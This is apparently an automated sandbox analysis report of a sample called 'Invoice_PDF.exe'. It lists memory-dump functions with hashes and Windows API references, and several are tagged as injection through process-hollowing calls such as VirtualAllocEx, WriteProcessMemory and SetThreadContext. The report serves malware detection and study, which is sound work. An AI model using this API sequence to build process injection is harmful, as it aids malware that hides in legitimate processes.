                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 09142260, Relevance: .7, Instructions: 723COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282553913.0000000009140000.00000040.00000001.sdmp, Offset: 09140000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9b5040da298702d13f3467e04ceb5db6c07ffbf5dddf99abf6d965d7ff9f4d5e
                                                                                                  • Instruction ID: c81174550419b2e0ab493b7256b823543c7dc4eae4ffe114621a670d2371a7bd
                                                                                                  • Opcode Fuzzy Hash: 9b5040da298702d13f3467e04ceb5db6c07ffbf5dddf99abf6d965d7ff9f4d5e
                                                                                                  • Instruction Fuzzy Hash: 2D528235B001159FCB18DFA9C888AADB7B2FF89358B158969F815DB364DB30DC81CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0914521B, Relevance: .6, Instructions: 553COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282553913.0000000009140000.00000040.00000001.sdmp, Offset: 09140000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8d99259d90c08a4e5170bd79b03151c3ea10456e80194ce73985c55a6906477a
                                                                                                  • Instruction ID: 8ae791ac0990fd6e9bfadeb71b04184f85bf2e4933b93f6469081553d82aee82
                                                                                                  • Opcode Fuzzy Hash: 8d99259d90c08a4e5170bd79b03151c3ea10456e80194ce73985c55a6906477a
                                                                                                  • Instruction Fuzzy Hash: 2F52C974A012198FCB64DFA4C898ADDB7B6BF89304F1085E9D50AA7764DF30AE81CF51
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 09221380, Relevance: .3, Instructions: 321COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282928899.0000000009220000.00000040.00000001.sdmp, Offset: 09220000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2dbb9629e7142cabf92c749174edf2758a7ac6eccc0069319e6a895042309683
                                                                                                  • Instruction ID: e4d660933855cd73daa4695084b9e287969c659f5b14107a0421ba329feb518b
                                                                                                  • Opcode Fuzzy Hash: 2dbb9629e7142cabf92c749174edf2758a7ac6eccc0069319e6a895042309683
                                                                                                  • Instruction Fuzzy Hash: 87C1D870E14225AFCB24CF69D580DAEB7B6BF85304F158468E416AB252DB31EC62CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 02E2C100, Relevance: 6.1, APIs: 4, Instructions: 139threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32 ref: 02E2C170
                                                                                                  • GetCurrentThread.KERNEL32 ref: 02E2C1AD
                                                                                                  • GetCurrentProcess.KERNEL32 ref: 02E2C1EA
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 02E2C243
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.275942173.0000000002E20000.00000040.00000001.sdmp, Offset: 02E20000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: Current$ProcessThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2063062207-0
                                                                                                  • Opcode ID: 84bb2108479dae831a6664bcd8c1420b304d851e3dbb6997f262314479dceb6c
                                                                                                  • Instruction ID: bfc80e39bfedb30b274b7e2f9ea236912d96d9010126f48511a05f972790462b
                                                                                                  • Opcode Fuzzy Hash: 84bb2108479dae831a6664bcd8c1420b304d851e3dbb6997f262314479dceb6c
                                                                                                  • Instruction Fuzzy Hash: 525198B09007588FDB14CFA9C549BDEBFF0EF99318F24899AE449A7250CB746849CF61
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 02E2C110, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32 ref: 02E2C170
                                                                                                  • GetCurrentThread.KERNEL32 ref: 02E2C1AD
                                                                                                  • GetCurrentProcess.KERNEL32 ref: 02E2C1EA
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 02E2C243
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.275942173.0000000002E20000.00000040.00000001.sdmp, Offset: 02E20000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: Current$ProcessThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2063062207-0
                                                                                                  • Opcode ID: 0d39a52fe5881563c7a0838936ff27d40dfcc55c6a425d41df51493dd3573e3f
                                                                                                  • Instruction ID: d7de7e0f90af7d1c0287b757458832306319cb884b4aac8815453f2e5cc3bbe7
                                                                                                  • Opcode Fuzzy Hash: 0d39a52fe5881563c7a0838936ff27d40dfcc55c6a425d41df51493dd3573e3f
                                                                                                  • Instruction Fuzzy Hash: D55167B09007588FDB14CFA9D549BDEBBF0EF98318F20C95AE409A7250C774A889CF61
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0914E678, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0914E8AE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282553913.0000000009140000.00000040.00000001.sdmp, Offset: 09140000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: CreateProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 963392458-0
                                                                                                  • Opcode ID: 16717900bf448f7389b96e237ed30300a31973faaea455b27442e0f5295d64dd
                                                                                                  • Instruction ID: 990336f3028a08fcd45bf0053d99175abb252a43813c92f2c273ca1b56107f00
                                                                                                  • Opcode Fuzzy Hash: 16717900bf448f7389b96e237ed30300a31973faaea455b27442e0f5295d64dd
                                                                                                  • Instruction Fuzzy Hash: AE913D71E00619DFDF20CFA8C8857EDBBB2BF48318F148569E819A7280DB749985CF91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 02E29E10, Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 02E2A056
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.275942173.0000000002E20000.00000040.00000001.sdmp, Offset: 02E20000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: HandleModule
                                                                                                  • String ID:
                                                                                                  • API String ID: 4139908857-0
                                                                                                  • Opcode ID: 129adc951a1e4a4081c2eca1121f717d1c2ecf3811601c3f28282af7aee9ec6f
                                                                                                  • Instruction ID: 9677ed3dccb6b411c052e43c6a01612893ea2be8ac5519b5a647f20438b0b965
                                                                                                  • Opcode Fuzzy Hash: 129adc951a1e4a4081c2eca1121f717d1c2ecf3811601c3f28282af7aee9ec6f
                                                                                                  • Instruction Fuzzy Hash: 97714470A00B158FD724DF6AC5447AABBF5BF88208F10992DD44ADBA40D735E849CF91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 02E2545C, Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 02E25519
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.275942173.0000000002E20000.00000040.00000001.sdmp, Offset: 02E20000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: Create
                                                                                                  • String ID:
                                                                                                  • API String ID: 2289755597-0
                                                                                                  • Opcode ID: b8814b4cfce62063a2c6a4090e4e79c626d916f2df2ef3e3a34d7ff363496d42
                                                                                                  • Instruction ID: 7867307c28d5a84839fecc3d011ae2f0dad6c4353ff80a3f4fd7a4c92171371e
                                                                                                  • Opcode Fuzzy Hash: b8814b4cfce62063a2c6a4090e4e79c626d916f2df2ef3e3a34d7ff363496d42
                                                                                                  • Instruction Fuzzy Hash: BC4129B0C40718CFDB24CFA9C984BDDBBBABF98308F548569D409AB250D775594ACF50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 02E23E44, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 02E25519
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.275942173.0000000002E20000.00000040.00000001.sdmp, Offset: 02E20000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: Create
                                                                                                  • String ID:
                                                                                                  • API String ID: 2289755597-0
                                                                                                  • Opcode ID: 23d903de5784661a7e346fdd736310c7bcd3a4be8cb5fc562793641cd2c2b645
                                                                                                  • Instruction ID: c0eafc1b697d6a2075989c2c488ef2199d9ba390f0c5148f434cdf64e4ba1845
                                                                                                  • Opcode Fuzzy Hash: 23d903de5784661a7e346fdd736310c7bcd3a4be8cb5fc562793641cd2c2b645
                                                                                                  • Instruction Fuzzy Hash: 2A41F5B0C40728CFDB24CFA9C944BDEBBB9BF58308F548569D409AB250D775594ACF90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0914E3F0, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0914E480
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282553913.0000000009140000.00000040.00000001.sdmp, Offset: 09140000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProcessWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 3559483778-0
                                                                                                  • Opcode ID: 6d64ed6a8dd1c132a7923e656cfe1a8ae80ff9139ccfc35b5eb0289e22a0e36c
                                                                                                  • Instruction ID: 3926c0abf44e45d6b00f23b27f49c188020c21aebbea2d7470c244528eca251e
                                                                                                  • Opcode Fuzzy Hash: 6d64ed6a8dd1c132a7923e656cfe1a8ae80ff9139ccfc35b5eb0289e22a0e36c
                                                                                                  • Instruction Fuzzy Hash: 572125B19003199FCF10CFA9C984BDEBBF5FF48314F54882AE918A7640D778A944CBA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0914E258, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SetThreadContext.KERNELBASE(?,00000000), ref: 0914E2D6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282553913.0000000009140000.00000040.00000001.sdmp, Offset: 09140000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: ContextThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 1591575202-0
                                                                                                  • Opcode ID: caf3d38b1b296befc8f1cfbf1d7baf00773df6fca1b56bfc7267e3efdc4fb12d
                                                                                                  • Instruction ID: 486933b2431031d28b844473bb078aa874434456e6ccedca58a6d74923a0bffa
                                                                                                  • Opcode Fuzzy Hash: caf3d38b1b296befc8f1cfbf1d7baf00773df6fca1b56bfc7267e3efdc4fb12d
                                                                                                  • Instruction Fuzzy Hash: 3E213871D003088FDB10DFA9C584BEEBBF4EF98228F548429D419A7240DB78A945CFA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0914E4E0, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0914E560
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282553913.0000000009140000.00000040.00000001.sdmp, Offset: 09140000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProcessRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 1726664587-0
                                                                                                  • Opcode ID: 78dadd16ad90cc1494a4c49f1d065b0ab86e41da5948f420e3de65dd8bed2a18
                                                                                                  • Instruction ID: 769d15ad6bd3c1dc93b9c40654d52f1583fb0285be3d2c734d51043031053d8c
                                                                                                  • Opcode Fuzzy Hash: 78dadd16ad90cc1494a4c49f1d065b0ab86e41da5948f420e3de65dd8bed2a18
                                                                                                  • Instruction Fuzzy Hash: C02128B1D003199FCB10DFA9C880BDEBBF5FF48314F548829E919A7240D7749944CBA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 02E2C332, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02E2C3BF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.275942173.0000000002E20000.00000040.00000001.sdmp, Offset: 02E20000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: DuplicateHandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 3793708945-0
                                                                                                  • Opcode ID: 5d84586fed1096cb629473f9f475125af3cf07377ac110bc6e89df369e9e6c83
                                                                                                  • Instruction ID: bf33eadc0642ed2985af5486601f02305fa0499f4e47e43f1ecdfbf212c941cd
                                                                                                  • Opcode Fuzzy Hash: 5d84586fed1096cb629473f9f475125af3cf07377ac110bc6e89df369e9e6c83
                                                                                                  • Instruction Fuzzy Hash: 922112B59002189FCB10CFA9D984AEEBFF4FF58324F14846AE814A7310C378A945CF60
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 02E2C338, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02E2C3BF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.275942173.0000000002E20000.00000040.00000001.sdmp, Offset: 02E20000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: DuplicateHandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 3793708945-0
                                                                                                  • Opcode ID: 4d2b6b84d32aef926b63251f404bb4faf1aa7fd78982d98dfd5fa5e32af40717
                                                                                                  • Instruction ID: fd19c2e5c3a9b4631b45ce06d7f6768b0f14119fa8479db4cea5e737b2a5bb22
                                                                                                  • Opcode Fuzzy Hash: 4d2b6b84d32aef926b63251f404bb4faf1aa7fd78982d98dfd5fa5e32af40717
                                                                                                  • Instruction Fuzzy Hash: BF21F3B59002189FDB10CFAAD984ADEBBF8FF48324F14845AE915A7310D374A944CFA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 02E2A270, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02E2A0D1,00000800,00000000,00000000), ref: 02E2A2E2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.275942173.0000000002E20000.00000040.00000001.sdmp, Offset: 02E20000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: LibraryLoad
                                                                                                  • String ID:
                                                                                                  • API String ID: 1029625771-0
                                                                                                  • Opcode ID: 30c60b61d3bc190d098414c7bc6d4ae6a73672464fd03a8ccc81191420ba83c6
                                                                                                  • Instruction ID: 0a2d44d80a9a77ee9886f9ac432936bdc36e89bdb1a184494837bb50e78cd05d
                                                                                                  • Opcode Fuzzy Hash: 30c60b61d3bc190d098414c7bc6d4ae6a73672464fd03a8ccc81191420ba83c6
                                                                                                  • Instruction Fuzzy Hash: 301106B2D002598FCB10CFA9C444ADEFBF5AB98324F14852AD419A7600C779A54ACFA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 02E291A0, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02E2A0D1,00000800,00000000,00000000), ref: 02E2A2E2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.275942173.0000000002E20000.00000040.00000001.sdmp, Offset: 02E20000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: LibraryLoad
                                                                                                  • String ID:
                                                                                                  • API String ID: 1029625771-0
                                                                                                  • Opcode ID: b879169a0317b359266ed1863f6418020d1ff10dfc036b10e7d65d5478a1a397
                                                                                                  • Instruction ID: e10a21828a3c1f9cdc28718ffd84cab63227c24da5103234c9ad3b758894ed62
                                                                                                  • Opcode Fuzzy Hash: b879169a0317b359266ed1863f6418020d1ff10dfc036b10e7d65d5478a1a397
                                                                                                  • Instruction Fuzzy Hash: 7711E7B69003599FCB10CF9AC444ADEFBF5EB58314F14852AD419A7700C375A549CFA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0914E330, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0914E39E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282553913.0000000009140000.00000040.00000001.sdmp, Offset: 09140000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 4275171209-0
                                                                                                  • Opcode ID: ac5637f226608a600f6da90df23a24f6077106df25d7ba029e97d4ca39ac4846
                                                                                                  • Instruction ID: 2244440f5aa6c81d6855375b6eb8b34ad4052b17c4852a17eb52659a88ef55b9
                                                                                                  • Opcode Fuzzy Hash: ac5637f226608a600f6da90df23a24f6077106df25d7ba029e97d4ca39ac4846
                                                                                                  • Instruction Fuzzy Hash: 2E1134719002089FCF10DFA9C844BDFBBF9EF98328F148829E915AB250C775A944CFA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0914E1A8, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282553913.0000000009140000.00000040.00000001.sdmp, Offset: 09140000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: ResumeThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 947044025-0
                                                                                                  • Opcode ID: 74a9d0d2d79c186a097e6a947cd7251c3be013c9786f2d59f659acf5d04cdf6a
                                                                                                  • Instruction ID: 252dd57edb2688ec28222fb3c6ba629ed4da78bbf766bb9cfa9e5ad81e6d705e
                                                                                                  • Opcode Fuzzy Hash: 74a9d0d2d79c186a097e6a947cd7251c3be013c9786f2d59f659acf5d04cdf6a
                                                                                                  • Instruction Fuzzy Hash: F81125B19007088FCB10DFAAC444BDFBBF9AF98228F148829D419A7240C774A944CBA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 02E29FF0, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 02E2A056
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.275942173.0000000002E20000.00000040.00000001.sdmp, Offset: 02E20000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: HandleModule
                                                                                                  • String ID:
                                                                                                  • API String ID: 4139908857-0
                                                                                                  • Opcode ID: 23eaf3f22fdd65aad67d3bf812a303ae6ecf6c0d2c3ce8c177c5c8f8e531cbfb
                                                                                                  • Instruction ID: 01dcf64e7d1fa29991f33819f575d3877f9689e31d676eca89b745020c6bf197
                                                                                                  • Opcode Fuzzy Hash: 23eaf3f22fdd65aad67d3bf812a303ae6ecf6c0d2c3ce8c177c5c8f8e531cbfb
                                                                                                  • Instruction Fuzzy Hash: CE1102B1D006598FCB20CF9AC444BDEFBF4AF88228F14842AD819B7200C375A549CFA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 09221812, Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • PostMessageW.USER32(?,?,?,?), ref: 09221875
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282928899.0000000009220000.00000040.00000001.sdmp, Offset: 09220000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: MessagePost
                                                                                                  • String ID:
                                                                                                  • API String ID: 410705778-0
                                                                                                  • Opcode ID: 069f27d0b66c8833849d74d0bf806ba1eb6cb4367d10a121c47b61e61364fd62
                                                                                                  • Instruction ID: bf3e151fd67c292e797f9d837702ec8aaf26c6e2e7c471b707821277fe00e43f
                                                                                                  • Opcode Fuzzy Hash: 069f27d0b66c8833849d74d0bf806ba1eb6cb4367d10a121c47b61e61364fd62
                                                                                                  • Instruction Fuzzy Hash: 9A1100B5900359DFDB20CF99C988BDEBBF8EB58324F14891AE454A7600C374A588CFA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 09221818, Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • PostMessageW.USER32(?,?,?,?), ref: 09221875
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282928899.0000000009220000.00000040.00000001.sdmp, Offset: 09220000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: MessagePost
                                                                                                  • String ID:
                                                                                                  • API String ID: 410705778-0
                                                                                                  • Opcode ID: 9cce306908c83f7cf8cf3da75e7bd35e9d6d81cdd02282f216f31219cd3d94e8
                                                                                                  • Instruction ID: 13c1f14449b9a0f7bbb5c9c5b528cf62e2bf7b77833e9649925fb773d603edd1
                                                                                                  • Opcode Fuzzy Hash: 9cce306908c83f7cf8cf3da75e7bd35e9d6d81cdd02282f216f31219cd3d94e8
                                                                                                  • Instruction Fuzzy Hash: D211E2B58007599FDB20CF99C989BDEBBF8EB58324F14881AE914A7600C374A954CFA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Non-executed Functions

                                                                                                  Function 02E26F21, Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.275942173.0000000002E20000.00000040.00000001.sdmp, Offset: 02E20000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: MIIa
                                                                                                  • API String ID: 0-1181251807
                                                                                                  • Opcode ID: d7aaa7cd3752e8950473313f2648df3db322b499a916d7259dec88c082b92509
                                                                                                  • Instruction ID: 6b14de9d480a2c10cbab7d83ebaa809498c59fa58d12f784f20df6126689fa78
                                                                                                  • Opcode Fuzzy Hash: d7aaa7cd3752e8950473313f2648df3db322b499a916d7259dec88c082b92509
                                                                                                  • Instruction Fuzzy Hash: F2416D30E55208EFDB48CFA5D5849ADFBF6EF89304F24E5A9C406EB224E7349A45CB04
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 02E2EFF8, Relevance: .3, Instructions: 315COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.275942173.0000000002E20000.00000040.00000001.sdmp, Offset: 02E20000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5f4da24038329016ccb9de8bc3a9150e86e8923a930ef9a92c36f391171e86ca
                                                                                                  • Instruction ID: 6fd396d4421777810e6fd3b4025c55c4e5d500107f3921ba60f33cf16c054aeb
                                                                                                  • Opcode Fuzzy Hash: 5f4da24038329016ccb9de8bc3a9150e86e8923a930ef9a92c36f391171e86ca
                                                                                                  • Instruction Fuzzy Hash: 2612E7F5CD17468ADB10CF66EDD81893BA1B751328BD24A48C1E92BAD0DBB405EECF44
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 02E2CBB4, Relevance: .3, Instructions: 265COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.275942173.0000000002E20000.00000040.00000001.sdmp, Offset: 02E20000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ad0b8b2290dcd45d5fe5683240c6610536906aa9ea06ae6bccf1ab6e13bb9092
                                                                                                  • Instruction ID: 221caa38530ff145c9c0c9068f5adff25c3e433199b2df2787f8fc7250c7de34
                                                                                                  • Opcode Fuzzy Hash: ad0b8b2290dcd45d5fe5683240c6610536906aa9ea06ae6bccf1ab6e13bb9092
                                                                                                  • Instruction Fuzzy Hash: F9A17232E402298FCF05DFA5C9445DEB7B3FF85304B25956AE806BB260EB31A959CF40
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 02E2EFEA, Relevance: .2, Instructions: 223COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.275942173.0000000002E20000.00000040.00000001.sdmp, Offset: 02E20000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3a81d73ac167aadb7e64f2d830c7fb2bd96029dfc35d2ecd9c0e78379fc44844
                                                                                                  • Instruction ID: 41bfaa7419ccb8159d5d83384be18c9cc6914494257fd2747588e3802a4b6083
                                                                                                  • Opcode Fuzzy Hash: 3a81d73ac167aadb7e64f2d830c7fb2bd96029dfc35d2ecd9c0e78379fc44844
                                                                                                  • Instruction Fuzzy Hash: 15C15AB1CC17458ADB10CF66ECD81893BB1BB55328BD24B48D1A92BAD0DBB414EACF44
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 09146AB0, Relevance: .1, Instructions: 147COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282553913.0000000009140000.00000040.00000001.sdmp, Offset: 09140000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 151b367228408b3979a1ecefffe0f23d487aaa4f2aee82185f72fd70e4d2489b
                                                                                                  • Instruction ID: 7e75fa0d0af58633d133ab25b0a989f7c30b9334d36d538fa25af845e3c8fd82
                                                                                                  • Opcode Fuzzy Hash: 151b367228408b3979a1ecefffe0f23d487aaa4f2aee82185f72fd70e4d2489b
                                                                                                  • Instruction Fuzzy Hash: 56513D70E142098FDB48DFF9E991A9EBFF6EB85208F148839D018AB264DF755809CB41
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 09146AC0, Relevance: .1, Instructions: 144COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282553913.0000000009140000.00000040.00000001.sdmp, Offset: 09140000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e58b0f28902bd0cf6661dfb17f707a2b5aaa5099ce425f44410c8559a906868d
                                                                                                  • Instruction ID: afb6a1f3787931eecc84b37cc5d5a4e522e423a4d48f87c9d9b57f0c490fbb99
                                                                                                  • Opcode Fuzzy Hash: e58b0f28902bd0cf6661dfb17f707a2b5aaa5099ce425f44410c8559a906868d
                                                                                                  • Instruction Fuzzy Hash: 62513D70E142098FDB48DFF9E991A9EBFF6EB85208F10C839D018AB250DF755809CB41
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 09146D10, Relevance: .1, Instructions: 92COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.282553913.0000000009140000.00000040.00000001.sdmp, Offset: 09140000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ae940e22cf7886791d84081ddb8d5a5b3ab3720a9353f83439f03f6aa1354b9c
                                                                                                  • Instruction ID: de594c9db1bb795a32edde9c4b09944e2578c0478aae924e41f2e1f54e16db28
                                                                                                  • Opcode Fuzzy Hash: ae940e22cf7886791d84081ddb8d5a5b3ab3720a9353f83439f03f6aa1354b9c
                                                                                                  • Instruction Fuzzy Hash: 434123B1E05658CBEB6CCF678D4068AFAF7AFC9344F14C1BA851CAA215EB3005858F15
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Analysis Process: Invoice_PDF.exe PID: 5944 Parent PID: 6140 Invoice_PDF.exeCOMMON

                                                                                                  Executed Functions

